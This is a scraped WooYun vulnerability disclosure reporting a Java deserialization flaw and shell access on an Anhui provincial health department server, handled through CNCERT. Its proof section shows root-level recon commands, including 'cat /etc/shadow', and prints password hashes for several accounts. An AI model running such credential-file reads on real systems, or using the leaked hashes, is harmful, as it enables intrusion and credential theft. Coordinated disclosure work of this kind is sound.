安徽省卫生厅某系统服务器存在“Java 反序列化”漏洞，并getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168279

漏洞标题：安徽省卫生厅某系统服务器存在“Java 反序列化”漏洞，并getshell

漏洞作者：朱元璋

提交时间：2016-01-08 10:26

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-08：细节已通知厂商并且等待厂商处理中
2016-01-12：厂商已经确认，细节仅向厂商公开
2016-01-22：细节向核心白帽子及相关领域专家公开
2016-02-01：细节向普通白帽子公开
2016-02-11：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

详细说明：

地址http://**.**.**.**:7001/存在“Java 反序列化”漏洞

直接上传木马到服务器中

漏洞证明：

whoami
root
chkconfig --list
NetworkManager 	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
acpid          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
anacron        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
apmd           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
atd            	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
auditd         	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
autofs         	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
avahi-daemon   	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
avahi-dnsconfd 	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
bluetooth      	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
capi           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
conman         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
cpuspeed       	0:关闭	1:启用	2:启用	3:启用	4:启用	5:启用	6:关闭
crond          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
cups           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
dnsmasq        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
dund           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
firstboot      	0:关闭	1:关闭	2:关闭	3:启用	4:关闭	5:启用	6:关闭
gpm            	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
haldaemon      	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
hidd           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
hplip          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
httpd          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
ibmasm         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
ip6tables      	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
iptables       	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
irda           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
irqbalance     	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
isdn           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
kudzu          	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
lvm2-monitor   	0:关闭	1:启用	2:启用	3:启用	4:启用	5:启用	6:关闭
mcstrans       	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
mdmonitor      	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
mdmpd          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
messagebus     	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
microcode_ctl  	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
multipathd     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
netconsole     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
netfs          	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
netplugd       	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
network        	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
nfs            	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
nfslock        	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
nscd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
ntpd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
oddjobd        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
pand           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
pcscd          	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
portmap        	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
psacct         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
rawdevices     	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
rdisc          	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
readahead_early	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
readahead_later	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:启用	6:关闭
restorecond    	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
rpcgssd        	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
rpcidmapd      	0:关闭	1:关闭	2:关闭	3:启用	4:启用	5:启用	6:关闭
rpcsvcgssd     	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
saslauthd      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
sendmail       	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
smartd         	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
sshd           	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
syslog         	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
tcsd           	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
vncserver      	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
wdaemon        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
winbind        	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
wpa_supplicant 	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
xfs            	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
ypbind         	0:关闭	1:关闭	2:关闭	3:关闭	4:关闭	5:关闭	6:关闭
yum-updatesd   	0:关闭	1:关闭	2:启用	3:启用	4:启用	5:启用	6:关闭
cat /etc/shadow
root:$1$oWYRz.QQ$wp2ZRgzdsynivJm4NUVa21:15672:0:99999:7:::
bin:*:15672:0:99999:7:::
daemon:*:15672:0:99999:7:::
adm:*:15672:0:99999:7:::
lp:*:15672:0:99999:7:::
sync:*:15672:0:99999:7:::
shutdown:*:15672:0:99999:7:::
halt:*:15672:0:99999:7:::
mail:*:15672:0:99999:7:::
news:*:15672:0:99999:7:::
uucp:*:15672:0:99999:7:::
operator:*:15672:0:99999:7:::
games:*:15672:0:99999:7:::
gopher:*:15672:0:99999:7:::
ftp:*:15672:0:99999:7:::
nobody:*:15672:0:99999:7:::
nscd:!!:15672:0:99999:7:::
vcsa:!!:15672:0:99999:7:::
rpc:!!:15672:0:99999:7:::
apache:!!:15672:0:99999:7:::
mailnull:!!:15672:0:99999:7:::
smmsp:!!:15672:0:99999:7:::
pcap:!!:15672:0:99999:7:::
ntp:!!:15672:0:99999:7:::
dbus:!!:15672:0:99999:7:::
avahi:!!:15672:0:99999:7:::
hsqldb:!!:15672:0:99999:7:::
rpcuser:!!:15672:0:99999:7:::
nfsnobody:!!:15672:0:99999:7:::
sshd:!!:15672:0:99999:7:::
haldaemon:!!:15672:0:99999:7:::
avahi-autoipd:!!:15672:0:99999:7:::
xfs:!!:15672:0:99999:7:::
gdm:!!:15672:0:99999:7:::
xidian:$1$bHALcqBl$Dxdnb.4jjjOJxJFQcoCpX.:15679:0:99999:7:::
weblogic:$1$.87ToHdB$k6GAjmi9WgutqdBaMk4xx/:15679:0:99999:7:::
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:25:90:66:3D:94  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          inet6 addr: fe80::225:90ff:fe66:3d94/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:9737491 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4780976 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1700326260 (1.5 GiB)  TX bytes:3465840049 (3.2 GiB)
          Memory:fade0000-fae00000 
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2540 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2540 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2140323 (2.0 MiB)  TX bytes:2140323 (2.0 MiB)
cat /etc/resolv.conf
search **.**.**.**
nameserver **.**.**.**
lsb_release -a
LSB Version:	:core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch
Distributor ID:	CentOS
Description:	CentOS release 5.5 (Final)
Release:	5.5
Codename:	Final
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       Timer
tcp        0      0 **.**.**.**:2208              **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:111                 **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:631               **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:7001            **.**.**.**:1689            SYN_RECV    on (9.64/5/0)
tcp        0      0 **.**.**.**:7001            **.**.**.**:1687            SYN_RECV    on (8.24/5/0)
tcp        0      0 **.**.**.**:7001            **.**.**.**:1690            SYN_RECV    on (9.04/5/0)
tcp        0      0 **.**.**.**:7001            **.**.**.**:1688            SYN_RECV    on (9.24/5/0)
tcp        0      0 **.**.**.**:25                **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:858                 **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:2207              **.**.**.**:*                   LISTEN      off (0.00/0/0)
tcp        0      0 :::2295                     :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     :::*                        LISTEN      keepalive (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001       :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 fe80::225:90ff:fe66:3d:7001 :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 ::1:7001                    :::*                        LISTEN      off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:38773 ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:38223 ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:63714 ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48587    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48590    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48591    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48588    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48589    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48594    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48595    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48592    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48593    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:48596    ::ffff:**.**.**.**:1521     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:1702     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:1701     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:1700     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:1699     ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:62743 ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:62742 ESTABLISHED off (0.00/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:10840 FIN_WAIT2   timewait (58.77/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:10863 TIME_WAIT   timewait (25.11/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:10862 TIME_WAIT   timewait (25.11/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:12925 FIN_WAIT2   timewait (58.77/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:12924 FIN_WAIT2   timewait (58.77/0/0)
tcp        0      0 ::ffff:**.**.**.**:7001     ::ffff:**.**.**.**:10864 FIN_WAIT2   timewait (58.77/0/0)
udp        0      0 **.**.**.**:58700           **.**.**.**:53           ESTABLISHED off (0.00/0/0)
udp        0      0 **.**.**.**:852                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:41175               **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:855                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:5353                **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:111                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 **.**.**.**:631                 **.**.**.**:*                               off (0.00/0/0)
udp        0      0 :::41784                    :::*                                    off (0.00/0/0)
udp        0      0 :::5353                     :::*                                    off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     15038  /tmp/.font-unix/fs7100
unix  2      [ ACC ]     STREAM     LISTENING     15924  /tmp/.gdm_socket
unix  2      [ ACC ]     STREAM     LISTENING     15977  /tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     16191  @/tmp/fam-root-
unix  2      [ ACC ]     STREAM     LISTENING     9685   /var/run/setrans/.setrans-unix
unix  17     [ ]         DGRAM                    10068  /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     11309  @/var/run/hald/dbus-rKj81NvIUV
unix  2      [ ACC ]     STREAM     LISTENING     10001  /var/run/audispd_events
unix  2      [ ]         DGRAM                    2898   @/org/kernel/udev/udevd
unix  2      [ ACC ]     STREAM     LISTENING     11063  /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     11273  /var/run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     11283  /var/run/**.**.**.**m
unix  2      [ ]         DGRAM                    11319  @/org/freedesktop/hal/udev_event
unix  2      [ ACC ]     STREAM     LISTENING     14603  /var/run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     15182  /var/run/avahi-daemon/socket
unix  2      [ ACC ]     STREAM     LISTENING     11310  @/var/run/hald/dbus-TOG6nR6oZW
unix  2      [ ACC ]     STREAM     LISTENING     14845  /dev/gpmctl
unix  2      [ ]         DGRAM                    712444 
unix  3      [ ]         STREAM     CONNECTED     712443 /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     712442 
unix  2      [ ]         DGRAM                    456249 
unix  2      [ ]         STREAM     CONNECTED     55360  
unix  3      [ ]         STREAM     CONNECTED     16431  /tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16430  
unix  3      [ ]         STREAM     CONNECTED     16387  /tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     16386  
unix  3      [ ]         STREAM     CONNECTED     16362  /tmp/.font-unix/fs7100
unix  3      [ ]         STREAM     CONNECTED     16361  
unix  3      [ ]         STREAM     CONNECTED     16194  @/tmp/fam-root-
unix  3      [ ]         STREAM     CONNECTED     16193  
unix  3      [ ]         STREAM     CONNECTED     16180  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     16179  
unix  3      [ ]         STREAM     CONNECTED     16076  /var/run/**.**.**.**m
unix  3      [ ]         STREAM     CONNECTED     16075  
unix  2      [ ]         DGRAM                    15997  
unix  3      [ ]         STREAM     CONNECTED     15984  /var/run/acpid.socket
unix  3      [ ]         STREAM     CONNECTED     15983  
unix  3      [ ]         STREAM     CONNECTED     16365  /tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     15981  
unix  3      [ ]         STREAM     CONNECTED     15185  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     15184  
unix  3      [ ]         STREAM     CONNECTED     15175  
unix  3      [ ]         STREAM     CONNECTED     15174  
unix  2      [ ]         DGRAM                    15172  
unix  2      [ ]         DGRAM                    14789  
unix  2      [ ]         DGRAM                    14763  
unix  2      [ ]         DGRAM                    14741  
unix  2      [ ]         DGRAM                    14692  
unix  2      [ ]         DGRAM                    14492  
unix  2      [ ]         DGRAM                    14448  
unix  2      [ ]         DGRAM                    14359  
unix  3      [ ]         STREAM     CONNECTED     14329  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     14328  
unix  3      [ ]         STREAM     CONNECTED     14308  @/var/run/hald/dbus-rKj81NvIUV
unix  3      [ ]         STREAM     CONNECTED     14307  
unix  3      [ ]         STREAM     CONNECTED     14137  @/var/run/hald/dbus-rKj81NvIUV
unix  3      [ ]         STREAM     CONNECTED     14136  
unix  3      [ ]         STREAM     CONNECTED     14091  @/var/run/hald/dbus-rKj81NvIUV
unix  3      [ ]         STREAM     CONNECTED     14090  
unix  3      [ ]         STREAM     CONNECTED     14044  /var/run/acpid.socket
unix  3      [ ]         STREAM     CONNECTED     14043  
unix  3      [ ]         STREAM     CONNECTED     14036  @/var/run/hald/dbus-rKj81NvIUV
unix  3      [ ]         STREAM     CONNECTED     14034  
unix  3      [ ]         STREAM     CONNECTED     11313  @/var/run/hald/dbus-TOG6nR6oZW
unix  3      [ ]         STREAM     CONNECTED     11312  
unix  2      [ ]         DGRAM                    11239  
unix  3      [ ]         STREAM     CONNECTED     11139  /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     11138  
unix  2      [ ]         DGRAM                    11101  
unix  3      [ ]         STREAM     CONNECTED     11079  
unix  3      [ ]         STREAM     CONNECTED     11078  
unix  3      [ ]         STREAM     CONNECTED     11019  
unix  3      [ ]         STREAM     CONNECTED     11018  
unix  2      [ ]         DGRAM                    10825  
unix  2      [ ]         DGRAM                    10076  
unix  3      [ ]         STREAM     CONNECTED     9992   
unix  3      [ ]         STREAM     CONNECTED     9991

修复方案：

加强安全意识

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-01-12 16:23

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168279

漏洞标题：安徽省卫生厅某系统服务器存在“Java 反序列化”漏洞，并getshell

相关厂商：安徽省卫生厅

漏洞作者：朱元璋

提交时间：2016-01-08 10:26

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168279

漏洞标题：安徽省卫生厅某系统服务器存在“Java 反序列化”漏洞，并getshell

相关厂商：安徽省卫生厅

漏洞作者： 朱元璋

提交时间：2016-01-08 10:26

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0168279"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：朱元璋

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源朱元璋@乌云